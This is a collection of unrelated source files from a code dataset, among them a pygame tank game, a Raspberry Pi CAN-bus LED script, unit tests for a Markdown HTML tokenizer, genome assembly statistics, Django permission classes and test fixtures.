self.player_anim_right.reverse()\n\n def check_anim(self):\n self.last_anim += 1\n if self.last_anim == 8:\n self.last_anim = 0\n\n def update(self):\n # изменение координат игрока в зависимости от кнопки\n key = pygame.key.get_pressed()\n\n if key[pygame.K_w]:\n self.rect.y -= self.sp\n self.image = self.player_anim_forward[self.last_anim]\n self.check_anim()\n self.lastKey = 'w'\n elif key[pygame.K_s]:\n self.rect.y += self.sp\n self.image = self.player_anim_back[self.last_anim]\n self.check_anim()\n self.lastKey = 's'\n elif key[pygame.K_d]:\n self.rect.x += self.sp\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.lastKey = 'd'\n elif key[pygame.K_a]:\n self.rect.x -= self.sp\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.lastKey = 'a'\n\n self.lastRect_x = self.rect.x\n self.lastRect_y = self.rect.y\n self.check_border()\n\n def shoot(self):\n\n bullet = Bullet(self.rect.centerx, self.rect.top, 'w')\n if self.lastKey == 'w':\n bullet = Bullet(self.rect.centerx, self.rect.top, self.lastKey)\n elif self.lastKey == 's':\n bullet = Bullet(self.rect.centerx, self.rect.bottom, self.lastKey)\n elif self.lastKey == 'a':\n bullet = Bullet(self.rect.centerx - 30, self.rect.y + 30, self.lastKey, notSide=False)\n elif self.lastKey == 'd':\n bullet = Bullet(self.rect.centerx + 30, self.rect.y + 30, self.lastKey, notSide=False)\n all_sprites.add(bullet)\n player_bullets.add(bullet)\n\n def check_border(self, is_collided=False):\n if is_collided is False:\n if self.rect.left + self.sp < 260:\n self.rect.left = 260\n if self.rect.right + self.sp > 1040:\n self.rect.right = 1040\n if self.rect.top + self.sp < 0:\n self.rect.top = 0\n if self.rect.bottom + self.sp > 1000:\n self.rect.bottom = 1000\n\n if pygame.sprite.spritecollide(self, landscape, False) or \\\n pygame.sprite.spritecollide(self, iron_landscape, False):\n # игрок не движется при столкновении с препятствием так как из его координат вычитается скорость\n if self.lastKey == 'w':\n self.rect.y = self.rect.y + self.sp\n elif self.lastKey == 's':\n self.rect.y = self.rect.y - self.sp\n elif self.lastKey == 'a':\n self.rect.x = self.rect.x + self.sp\n elif self.lastKey == 'd':\n self.rect.x = self.rect.x - self.sp\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, direction, notSide=True):\n pygame.sprite.Sprite.__init__(self)\n self.dir = direction\n\n if notSide is False:\n self.image = pygame.Surface((15, 10))\n else:\n self.image = pygame.Surface((10, 20))\n self.image.fill((255, 255, 0))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n self.speed = 20\n\n def update(self):\n if self.dir == 'w':\n self.rect.y -= self.speed\n elif self.dir == 's':\n self.rect.y += self.speed\n elif self.dir == 'a':\n self.rect.x -= self.speed\n elif self.dir == 'd':\n self.rect.x += self.speed\n\n if self.rect.left < 0 or self.rect.right > 1280 or \\\n self.rect.top < 0 or self.rect.bottom > 1000:\n self.kill()\n\n\nclass Enemy(Player):\n def __init__(self):\n global player_base, landscape, player, way\n pygame.sprite.Sprite.__init__(self)\n self.speed = 110 # скорость пискелей в секунду\n self.is_ready_to_shoot = False\n self.cooldown = 0\n self.sp = self.speed // 60\n self.lastdir = 's'\n self.target_to_move = [640, 960]\n self.direction = choice(['r', 'l'])\n self.last_anim = 0\n self.alarm = False\n self.see_player = True\n\n self.load_images()\n self.image = pygame.image.load('Sprites/forward/forward7.PNG')\n self.image = pygame.transform.scale(self.image, (60, 60))\n self.rect = self.image.get_rect()\n self.rect.center = (630, 40)\n self.rect.inflate_ip(-20, 0)\n\n self.image.set_colorkey((255, 255, 255))\n\n self.hp = 15\n\n def load_images(self):\n self.player_anim_forward = []\n for i in range(1, 9):\n self.player_anim_forward.append(pygame.image.load('Sprites/forward/forward{id}.png'.format(id=str(i))))\n self.player_anim_forward.reverse()\n\n self.player_anim_back = []\n for i in range(1, 9):\n self.player_anim_back.append(pygame.image.load('Sprites/back/back{id}.png'.format(id=str(i))))\n\n self.player_anim_left = []\n for i in range(1, 9):\n self.player_anim_left.append(pygame.image.load('Sprites/left/left{id}.png'.format(id=str(i))))\n self.player_anim_left.reverse()\n\n self.player_anim_right = []\n for i in range(1, 9):\n self.player_anim_right.append(pygame.image.load('Sprites/right/right{id}.png'.format(id=str(i))))\n self.player_anim_right.reverse()\n\n def update(self):\n # рассчет дистанции до базы игрока и до самого игрока\n\n base_x, base_y = player_base.rect.x - self.rect.x, player_base.rect.y - self.rect.y\n player_x, player_y = player.rect.x - self.rect.x, player.rect.y - self.rect.y\n distance = math.hypot(base_x, base_y)\n distance_to_player = math.hypot(player_x, player_y)\n\n self.mask = pygame.mask.from_surface(self.image)\n if distance_to_player > 300 and (self.rect.right != self.rect.centerx or \\\n self.rect.centery != player.rect.centery):\n # движение к базе\n self.alarm = False\n if self.target_to_move[1] != self.rect.centery:\n if self.sp != 0:\n print(self.target_to_move)\n if self.rect.x > self.target_to_move[0]:\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.rect.x -= self.sp\n self.lastdir = 'a'\n elif self.rect.x < self.target_to_move[0]:\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.rect.x += self.sp\n self.lastdir = 'd'\n elif self.rect.y < self.target_to_move[1]:\n self.image = self.player_anim_back[self.last_anim]\n self.check_anim()\n self.rect.y += self.sp\n self.lastdir = 's'\n elif self.rect.y > self.target_to_move[1]:\n self.image = self.player_anim_forward[self.last_anim]\n self.check_anim()\n self.rect.y -= self.sp\n self.lastdir = 'w'\n else:\n pass\n else:\n self.target_to_move = player_base.rect.center\n if distance > 200:\n if self.rect.x > self.target_to_move[0]:\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.rect.x -= self.sp\n self.lastdir = 'a'\n elif self.rect.x < self.target_to_move[0]:\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.rect.x += self.sp\n self.lastdir = 'd'\n else:\n self.shoot()\n self.check_collide()\n else:\n self.alarm = True\n if self.rect.x > player.rect.x:\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.rect.x -= self.sp\n self.lastdir = 'a'\n elif self.rect.x < player.rect.x:\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.rect.x += self.sp\n self.lastdir = 'd'\n self.shoot()\n self.check_collide()\n\n def shoot(self):\n if not self.cooldown:\n if self.lastdir == 'w':\n bullet = Bullet(self.rect.centerx - 7, self.rect.top, self.lastdir)\n elif self.lastdir == 's':\n bullet = Bullet(self.rect.centerx + 7, self.rect.bottom, self.lastdir)\n elif self.lastdir == 'a':\n bullet = Bullet(self.rect.centerx - 30, self.rect.y + 30, self.lastdir, notSide=False)\n elif self.lastdir == 'd':\n bullet = Bullet(self.rect.centerx + 30, self.rect.y + 30, self.lastdir, notSide=False)\n all_sprites.add(bullet)\n enemy_bulltes.add(bullet)\n self.cooldown = 50\n else:\n self.cooldown -= 1\n\n def check_collide(self):\n wall = pygame.sprite.spritecollide(self, landscape, False)\n iron = pygame.sprite.spritecollide(self, iron_landscape, False)\n\n if wall:\n print('wall')\n self.sp = 0\n if self.alarm:\n self.rect.y -= 10\n self.sp = self.speed // 60\n return\n self.shoot()\n else:\n self.sp = self.speed // 60\n self.alarm = False\n\n if iron:\n self.rect.y -= 15\n if self.direction == 'r':\n if self.target_to_move[0] + 30 < 1280:\n self.target_to_move[0] += 30\n elif self.direction == 'l':\n if self.target_to_move[0] - 40 > 0:\n self.target_to_move[0] -= 40\n print('iron')\n\n if pygame.sprite.spritecollide(player, bushes, False):\n self.see_player = False\n else:\n self.see_player = True\n\n if pygame.sprite.spritecollide(self, players, False):\n self.shoot()\n\n\nclass Player_base(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.hp = 15\n\n self.image = pygame.image.load('Sprites/base.PNG')\n self.rect = self.image.get_rect()\n self.rect.center = (642, 960)\n\n def update(self):\n global running\n if self.hp == 0:\n running = False\n game_menu()\n\n\nclass Iron(pygame.sprite.Sprite):\n def __init__(self, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('Sprites/железная стенка.png')\n self.rect = self.image.get_rect()\n self.rect.center = (start_x, start_y)\n self.image.set_colorkey((255, 255, 255))\n\n def update(self):\n if pygame.sprite.spritecollide(self, player_bullets, True) or \\\n pygame.sprite.spritecollide(self, enemy_bulltes, True):\n pass\n\n\nclass Bush(pygame.sprite.Sprite):\n def __init__(self, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('Sprites/кустик.png')\n self.rect = self.image.get_rect()\n self.rect.center = (start_x, start_y)\n self.image.set_colorkey((255, 255, 255))\n\n\nclass Wall(pygame.sprite.Sprite):\n def __init__(self, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('Sprites/brick.png')\n self.rect = self.image.get_rect()\n self.rect.center = (start_x, start_y)\n self.image.set_colorkey((255, 255, 255))\n self.hp = 20\n\n def update(self):\n if pygame.sprite.spritecollide(self, enemy_bulltes, True) or \\\n pygame.sprite.spritecollide(self, player_bullets, True):\n self.hp -= 5\n if self.hp == 15:\n self.image = pygame.image.load('Sprites/first.png')\n elif self.hp == 10:\n self.image = pygame.image.load('Sprites/second.png')\n elif self.hp == 5:\n self.image = pygame.image.load('Sprites/third_2.png')\n elif self.hp == 0:\n self.kill()\n\n\ndef check_collide():\n global running, player, enemy, player_base, explosion\n # проверки на попадания пуль и на столкновения с объектами\n if pygame.sprite.groupcollide(enemies, player_bullets, False, True):\n enemy.hp -= 5\n if enemy.hp == 0:\n for i in range(3):\n enemy.image = explosion[i]\n enemy.kill()\n enemies.remove(enemy)\n all_sprites.remove(enemy)\n\n if pygame.sprite.spritecollide(player_base, enemy_bulltes, True):\n player_base.hp -= 5\n if player_base.hp == 0:\n for i in range(3):\n player_base.image = explosion[i]\n all_sprites.remove(player_base)\n running = False\n\n if pygame.sprite.spritecollide(player, enemy_bulltes, True):\n player.hp -= 5\n if player.hp == 0:\n for i in range(3):\n player.image = explosion[i]\n running = False\n\n if pygame.sprite.groupcollide(player_bullets, iron_landscape, True, False) or \\\n pygame.sprite.groupcollide(enemy_bulltes, iron_landscape, True, False):\n pass\n\n\ndef print_text(message, x, y, font_color=(0, 0, 0), font_size=30):\n font_type = pygame.font.SysFont('arial', font_size)\n text = font_type.render(message, True, font_color)\n screen.blit(text, (x, y))\n\n\nclass Button():\n def __init__(self, width, height, message):\n self.message = message\n self.width = width\n self.height = height\n self.inactive_clr = (136, 69, 53)\n self.active_clr = (120, 50, 40)\n\n def draw(self, x, y, message, font_size=30, action=None, button_sound=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if x < mouse[0] < x + self.width and y < mouse[1] < y + self.height:\n pygame.draw.rect(screen, self.active_clr, (x, y, self.width, self.height))\n\n if click[0] == 1:\n pygame.time.delay(300)\n if action is not None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n action()\n\n else:\n pygame.draw.rect(screen, self.inactive_clr, (x, y, self.width, self.height))\n\n print_text(message=self.message, x=x + 10, y=y + 10, font_size=font_size)\n\n\ndef game_menu():\n size = width, height = 600, 500\n screen = pygame.display.set_mode(size)\n menu = pygame.image.load('Sprites/логотип.png')\n menu = pygame.transform.scale(menu, (381, 241))\n menu.set_colorkey((255, 255, 255))\n\n button_for_start = Button(250, 70, 'Start')\n button_for_quit = Button(120, 70, 'Exit')\n\n show = True\n\n while show:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n screen.blit(menu, (150, 35))\n button_for_start.draw(170, 320, 'Начать игру', action=start_game)\n button_for_quit.draw(230, 400, 'Выйти из игры', action=quit)\n\n pygame.display.update()\n pygame.display.flip()\n clock.tick(60)\n\n\ndef load_map():\n global landscape, all_sprites, iron_poses\n landscape_pos = {\n 0: [650, 500], 1: [590, 500], 2: [710, 500], 3: [770, 560], 4: [830, 560], 5: [890, 560], 6: [890, 500],\n 7: [890, 440], 8: [830, 440], 9: [770, 440], 10: [290, 740], 11: [950, 500], 12: [1010, 500], 13: [1010, 560],\n 14: [1010, 440], 15: [410, 560], 16: [530, 560],\n 17: [470, 560], 18: [410, 560], 19: [470, 440], 20: [530, 440], 21: [410, 440], 22: [410, 500], 23: [350, 500],\n 24: [290, 500], 25: [290, 440], 26: [290, 560],\n 27: [290, 260], 28: [410, 260], 29: [530, 260], 30: [650, 260], 31: [770, 260], 32: [890, 260], 33: [1010, 260],\n 34: [1010, 740], 35: [890, 740], 36: [770, 740],\n 37: [650, 740], 38: [530, 740], 39: [410, 740]\n }\n bush_pos = {0: [290, 620], 1: [350, 620], 2: [350, 560], 3: [410, 620], 4: [470, 620], 5: [530, 620], 6: [590, 620],\n 7: [650, 620], 8: [710, 620], 9: [770, 620],\n 10: [830, 620], 11: [890, 620], 12: [950, 620], 13: [950, 560], 14: [1010, 620], 15: [290, 380],\n 16: [350, 380],\n 17: [350, 440], 18: [410, 380], 19: [470, 380], 20: [530, 380], 21: [590, 380],\n 22: [650, 380], 23: [710, 380], 24: [770, 380], 25: [830, 380], 26: [890, 380],\n 27: [950, 380], 28: [950, 440], 29: [1010, 380]\n }\n iron_pos = {0: [650, 560], 1: [710, 560], 2: [590, 560], 3: [650, 440], 4: [710, 440], 5: [590, 440], 6: [770, 500],\n 7: [830, 500], 8: [530, 500], 9: [470, 500], 10: [350, 260],\n 11: [470, 260], 12: [0, 0], 13: [0, 0], 14: [830, 260], 15: [950, 260],\n 16: [350, 740], 17: [470, 740], 18: [590, 740], 19: [710, 740], 20: [830, 740],\n 21: [950, 740]\n }\n\n for a in range(40):\n wall = Wall(landscape_pos[a][0], landscape_pos[a][1])\n landscape.add(wall)\n all_sprites.add(wall)\n for a in range(30):\n bush = Bush(bush_pos[a][0], bush_pos[a][1])\n bushes.add(bush)\n all_sprites.add(bush)\n for a in range(22):\n iron_wall = Iron(iron_pos[a][0], iron_pos[a][1])\n iron_landscape.add(iron_wall)\n all_sprites.add(iron_wall)\n\n\ndef start_game():\n global clock\n running = True\n fps = 60\n waves = 5\n size = width, height = 1280, 1000\n screen = pygame.display.set_mode(size)\n player_cooldown = pygame.USEREVENT + 2\n cooldown_shoot = False\n\n load_map()\n\n pygame.time.set_timer(player_cooldown, 1000)\n\n rect_color = (255, 0, 0)\n\n while running:\n clock.tick(fps)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n game_menu()\n\n if event.type == player_cooldown:\n cooldown_shoot = False\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE and cooldown_shoot is False:\n player.shoot()\n pygame.time.set_timer(player_cooldown, 1000)\n cooldown_shoot = True\n\n elif event.key == pygame.K_ESCAPE:\n running = False\n game_menu()\n\n all_sprites.update()\n if len(enemies) == 0 and waves != 0:\n enemy = Enemy()\n enemies.add(enemy)\n all_sprites.add(enemy)\n waves -= 1\n check_collide()\n\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n # pygame.draw.rect(screen, rect_color, enemy.rect)\n pygame.display.flip()\n\n for i in range(1, 4):\n explosion.append((pygame.image.load('Sprites/explosion/explosion{id}.png'.format(id=str(i)))))\n\n pygame.time.set_timer(player_cooldown, 1000)\n while running:\n clock.tick(fps)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == player_cooldown:\n cooldown_shoot = False\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE and cooldown_shoot is False:\n player.shoot()\n pygame.time.set_timer(player_cooldown, 1000)\n cooldown_shoot = True\n\n all_sprites.update()\n if len(enemies) == 0 and waves != 0:\n if waves != 5:\n enemy = Enemy()\n enemies.add(enemy)\n all_sprites.add(enemy)\n waves -= 1\n else:\n print('BOOOOOOOOOOOOOSS!')\n enemy = Enemy()\n enemy.hp = 30\n check_collide()\n\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n pygame.display.flip()\n\n\npygame.init()\nrunning = True\nfps = 60\nsize = width, height = 600, 800\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode(size)\nwaves = 5\nall_sprites = pygame.sprite.Group()\nlandscape = pygame.sprite.Group()\nplayer_bullets = pygame.sprite.Group()\nenemy_bulltes = pygame.sprite.Group()\nenemies = pygame.sprite.Group()\nplayers = pygame.sprite.Group()\niron_landscape = pygame.sprite.Group()\nbushes = pygame.sprite.Group()\n\nplayer = Player()\nplayers.add(player)\nenemy = Enemy()\nplayer_base = Player_base()\nenemies.add(enemy)\n\nall_sprites.add(player)\nall_sprites.add(enemy)\nlandscape.add(player_base)\nall_sprites.add(player_base)\nexplosion = []\n\nfor i in range(1, 4):\n explosion.append((pygame.image.load('Sprites/explosion/explosion{id}.png'.format(id=str(i)))))\n\ngame_menu()\n","sub_path":"Main_script.py","file_name":"Main_script.py","file_ext":"py","file_size_in_byte":23237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"649146963","text":"#!/usr/bin/python3\n#\n# simple_rx_test.py\n# \n# This is simple CAN receive python program. All messages received are printed out on screen.\n# For use with PiCAN boards on the Raspberry Pi\n# http://skpang.co.uk/catalog/pican2-canbus-board-for-raspberry-pi-2-p-1475.html\n#\n# Make sure Python-CAN is installed first http://skpang.co.uk/blog/archives/1220\n#\n# 01-02-16 SK Pang\n#\n#\n#\n\nimport can\nimport time\nimport os\nfrom dotstar import Adafruit_DotStar\n\nnumpixels = 77\nbrightness = 128\n\ndatapin = 23\nclockpin = 24\n\nprint('\\n\\rCAN Rx test')\nprint('Bring up CAN0....')\nos.system(\"sudo /sbin/ip link set can0 up type can bitrate 500000\")\ntime.sleep(0.1)\t\n\ntry:\n\tbus = can.interface.Bus(channel='can0', bustype='socketcan_native')\nexcept OSError:\n\tprint('Cannot find PiCAN board.')\n\texit()\n\t\nprint('Ready')\n\ntry:\n\tstrip = Adafruit_DotStar(numpixels, datapin, clockpin, order='gbr'.encode('utf-8'))\n\tstrip.begin()\n\tstrip.setBrightness(brightness)\n\n\twhile True:\n\t\tmessage = bus.recv()\t# Wait until a message is received.\n\n\t\tprint(message.data)\n\t\tprint(range(message.dlc ))\n\n\t\tc = '{0:f} {1:x} {2:x} '.format(message.timestamp, message.arbitration_id, message.dlc)\n\t\ts=''\n\t\tfor i in range(message.dlc ):\n\t\t\ts += '{0:x} '.format(message.data[i])\n\t\t\tprint(message.data[i])\n\t\tprint(' {}'.format(c+s))\n\t\t\n\t\tpointer = message.data[6]\n\t\tprint(pointer)\n\t\tstrip.clear()\n\t\tfor i in range(5):\n\t\t\tstrip.setPixelColor(pointer, 0xFF0000)\n\t\t\tpointer += 1\n\t\tstrip.show()\n\t\nexcept KeyboardInterrupt:\n\t#Catch keyboard interrupt\n\tos.system(\"sudo /sbin/ip link set can0 down\")\n\tprint('\\n\\rKeyboard interrtupt')\t\n\tstrip.clear()\n\tstrip.show()\n\tstrip.close()\n","sub_path":"simple_rx_test_led.py","file_name":"simple_rx_test_led.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"387238515","text":"from unittest import TestCase, mock\nfrom mistletoe.span_token import tokenize_inner, _token_types\nfrom mistletoe.block_token import tokenize\nfrom mistletoe import html_token\nfrom mistletoe.html_renderer import HTMLRenderer\n\nclass TestHTMLToken(TestCase):\n def setUp(self):\n self.renderer = HTMLRenderer()\n self.renderer.__enter__()\n self.addCleanup(self.renderer.__exit__, None, None, None)\n\n def _test_html_token(self, token, token_cls, content):\n self.assertIsInstance(token, token_cls)\n self.assertEqual(token.content, content)\n\n def test_span(self):\n raw = 'some more text'\n tokens = tokenize_inner(raw)\n next(tokens)\n content = 'more'\n self._test_html_token(next(tokens), html_token.HTMLSpan, content)\n next(tokens)\n\n def test_block(self):\n lines = ['

    a paragraph\\n',\n 'within an html block\\n',\n '

    \\n']\n token = next(tokenize(lines))\n content = '

    a paragraph\\nwithin an html block\\n

    \\n'\n self._test_html_token(token, html_token.HTMLBlock, content)\n\n def test_span_attrs(self):\n raw = 'more'\n token = next(tokenize_inner(raw))\n content = 'more'\n self._test_html_token(token, html_token.HTMLSpan, content)\n\n def test_block_attrs(self):\n lines = ['

    a paragraph\\n',\n 'within an html block\\n',\n '

    \\n']\n token = next(tokenize(lines))\n content = '

    a paragraph\\nwithin an html block\\n

    \\n'\n self._test_html_token(token, html_token.HTMLBlock, content)\n\n def test_comment(self):\n from mistletoe.block_token import Heading\n lines = ['\\n', '\\n', '# heading 1\\n']\n token1, token2 = tokenize(lines)\n content = '\\n'\n self._test_html_token(token1, html_token.HTMLBlock, content)\n self.assertIsInstance(token2, Heading)\n\n def test_empty_span(self):\n raw = ''\n token = next(tokenize_inner(raw))\n content = ''\n self._test_html_token(token, html_token.HTMLSpan, content)\n\n def test_self_closing_span(self):\n raw = ''\n token = next(tokenize_inner(raw))\n content = ''\n self._test_html_token(token, html_token.HTMLSpan, content)\n\n def test_autolink(self):\n from mistletoe.span_token import AutoLink\n self.assertIsInstance(next(tokenize_inner('')), AutoLink)\n\n","sub_path":"test/test_html_token.py","file_name":"test_html_token.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"257523769","text":"# assessment of assembly - this can be as simple as\n# N50/L50/MAX contig stats\n\nimport sys, os\nfrom Bio import SeqIO\nfrom AAFTF.utility import status\n\n\ndef genome_asm_stats(fasta_file,output_handle):\n\n lengths = []\n # could be smart here and handle compressed files?\n for record in SeqIO.parse(fasta_file, \"fasta\"):\n lengths.append(len(record))\n\n lengths.sort()\n total_len = sum(lengths)\n\n l50 = 0\n n50 = 0\n l90 = 0\n n90 = 0\n cumulsum = 0\n i = 1\n for n in reversed(lengths):\n cumulsum += n\n if n50 == 0 and cumulsum >= total_len * 0.5:\n n50 = n\n l50 = i\n if n90 == 0 and cumulsum >= total_len * 0.9:\n n90 = n\n l90 = i\n \n i += 1\n report = \"Assembly statistics for: %s\\n\" % (fasta_file)\n report += \"%15s = %d\\n\" % ('CONTIG COUNT',len(lengths))\n report += \"%15s = %d\\n\" % ('TOTAL LENGTH',total_len)\n report += \"%15s = %d\\n\" % ('MIN',lengths[0])\n report += \"%15s = %d\\n\" % ('MAX',lengths[-1])\n report += \"%15s = %d\\n\" % ('MEDIAN',lengths[int(len(lengths)/2)])\n report += \"%15s = %.2f\\n\" % ('MEAN', total_len/len(lengths))\n report += \"%15s = %d\\n\" % ('L50', l50)\n report += \"%15s = %d\\n\" % ('N50', n50)\n report += \"%15s = %d\\n\" % ('L90', l90)\n report += \"%15s = %d\\n\" % ('N90', n90)\n \n print(report)\n if output_handle:\n output_handle.write(report)\n\ndef run(parser,args):\n\n if not os.path.exists(args.input):\n status(\"Inputfile %s was not readable, check parameters\" % (args.input))\n\n output_handle=None\n \n if args.report:\n output_handle = open(args.report,\"w\")\n\n genome_asm_stats(args.input, output_handle)\n \n","sub_path":"AAFTF/assess.py","file_name":"assess.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"65508409","text":"import unittest\n\nfrom core.evsrc import EvSrc\nfrom plugins.simpledirectorywatcher import SimpleDirectoryWatcher\n\nfrom os import unlink\nfrom tempfile import mkstemp\n\nOPTS = { 'debug' : False }\n\nclass TestSimpleDirectoryWatcher(unittest.TestCase):\n def setUp(self):\n self._evsrc = EvSrc(**OPTS)\n self._source = SimpleDirectoryWatcher('/tmp')\n self._evsrc.add(self._source)\n\n def test_added(self):\n self._added_ok = False\n self._evsrc.connect(self._added_cb, signal = 'file-added')\n\n self._evsrc.step()\n self._test_file = mkstemp(dir='/tmp')[1]\n self._evsrc.step()\n\n self.assertTrue(self._added_ok)\n\n def test_removed(self):\n self._removed_ok = False\n self._evsrc.connect(self._removed_cb, signal = 'file-removed')\n\n self._test_file = mkstemp(dir='/tmp')[1]\n self._evsrc.step()\n unlink(self._test_file) \n self._evsrc.step()\n\n self.assertTrue(self._removed_ok)\n\n def _added_cb(self, **kwargs):\n if kwargs.get('path') == self._test_file:\n self._added_ok = True\n\n def _removed_cb(self, **kwargs):\n if kwargs.get('path') == self._test_file:\n self._removed_ok = True\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/simpledirectorywatcher.py","file_name":"simpledirectorywatcher.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"284865033","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n__author__ = 'Dylan'\n\n__all__ = [\n 'fixture'\n]\n\nimport collections\nimport copy\nimport datetime\nimport random\nimport string\nimport time\n\nimport faker\n\ndatetime_fmt = '%Y-%m-%dT%H:%M:%SZ'\ndate_fmt = '%Y-%m-%d'\n\n\nclass BaseFixture(object):\n fake = faker.Factory.create('zh_CN')\n\n fake.datetime = lambda pattern: datetime.datetime.strptime(faker.Factory.create().\n date(pattern=datetime_fmt), datetime_fmt)\n fake.date = lambda: datetime.datetime.strptime(faker.Factory.create().date(pattern=date_fmt), date_fmt)\n fake.random_float = lambda *args, **kwargs: float(faker.Factory.create().random_int(*args, **kwargs))\n\n fake.email = lambda: 'email.{n}@gmail.com'.format(n=random.randint(0, 999))\n\n fake.name = lambda: ''.join(random.sample(string.ascii_lowercase, 4))\n\n fake.id = lambda: random.randint(1, int(time.time() / 365))\n\n @property\n def dummy_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.text()[:128],\n }\n\n @property\n def dummy_user_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.name(),\n 'password': self.fake.text()[:16],\n }\n\n @property\n def dummy_profile_fixture(self):\n return {\n 'id': self.fake.id(),\n 'screen_name': self.fake.name(),\n 'birth': self.fake.date(),\n }\n\n @property\n def dummy_address_fixture(self):\n return {\n 'id': self.fake.id(),\n 'country': self.fake.country(),\n 'province': self.fake.city(),\n 'city': self.fake.city(),\n 'district': self.fake.city_suffix(),\n 'line': self.fake.street_address(),\n 'post': self.fake.postcode(),\n }\n\n @property\n def dummy_role_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.name(),\n }\n\n @property\n def dummy_permission_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.name(),\n }\n\n @property\n def dummy_role_permission_fixture(self):\n return {\n 'id': self.fake.id(),\n 'role_id': self.fake.id(),\n 'permission_id': self.fake.id(),\n 'extra_data': self.fake.name(),\n }\n\n def update_with_default_field_values(self, fixture, **field_values):\n for field, value in field_values.items():\n if isinstance(value, collections.Callable):\n fixture[field] = value()\n elif value is None:\n fixture.pop(field, None)\n else:\n fixture[field] = value\n\n def generate_fixture(self, entity, **field_values):\n assert entity, 'entity could not be empty or none'\n assert isinstance(entity, str), 'entity must be an instance of str'\n result = copy.deepcopy(getattr(self, '{0}_fixture'.format(entity)))\n if result:\n self.update_with_default_field_values(result, **field_values)\n return result\n assert '{0}_fixture not found!'.format(entity)\n\n\ndef fixture(entity, **named):\n return BaseFixture().generate_fixture(entity, **named)\n","sub_path":"api/tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"175181750","text":"from tkinter import * \n \ntop = Tk() \n \ntop.geometry(\"500x500\") \n \n#creating a simple canvas \nc = Canvas(top,bg = \"pink\",height = \"800\",width=\"800\") \nlistx=[50,55,60,65,70,75,80]\nlisty=[50,55,60,65,70,75,80]\nfor i in listx:\n return i\n\nc.create_text(x,y,fill=\"darkblue\",font=\"Times 20 italic bold\",text=\".\")\n \nc.pack() \n \ntop.mainloop() ","sub_path":"VSCode Projects/python projects/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"309625197","text":"from rest_framework import permissions\n\nfrom django.contrib.auth import get_user_model\n\nclass IsOwnerOrAdmin(permissions.BasePermission):\n def has_object_permission(self, request, view, timezone_obj):\n return request.user.is_superuser or timezone_obj.user == request.user\n\nclass IsNotCrossOriginOrIsSuperUser(permissions.BasePermission):\n def has_permission(self, request, view):\n custom_user = request.GET.get('username')\n\n if not custom_user or custom_user == request.user.get_username():\n # request is not cross origin\n return True\n\n if not request.user.is_superuser:\n return False\n\n custom_user_objs = get_user_model().objects.filter(username=custom_user)\n\n # user with name in query param not found\n if not custom_user_objs:\n return False\n\n # user with name in query param is superuser\n return not custom_user_objs[0].is_superuser\n\n\n\n","sub_path":"django/src/timezone/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"628396974","text":"def menu():\r\n import os, sys\r\n print(\"************** Acceso al Sistema de Telecomunicaciones **************\")\r\n print(\"\")\r\n print(\"1.- Agregar alumnos: \")\r\n print(\"2.- Mostrar lista de alumnos: \")\r\n print(\"3.- Clasificarlos segun su año: \")\r\n print(\"4.- Modificar lista de alumnos\")\r\n print(\"5.- Salir\")\r\n try:\r\n op=int(input(\"Introduzca el numero de la opcion deseada: \"))\r\n except:\r\n print(\"Esto no es un numero, porfavor elija algun numero de las opciones mostradas\")\r\n print(\"\")\r\n menu()\r\n os.system(\"cls\")\r\n if op==1:\r\n agregar()\r\n elif op==2:\r\n ver()\r\n elif op==3:\r\n clasificar()\r\n elif op==4:\r\n modificar()\r\n elif op==5:\r\n salir()\r\n else:\r\n print(\"Por 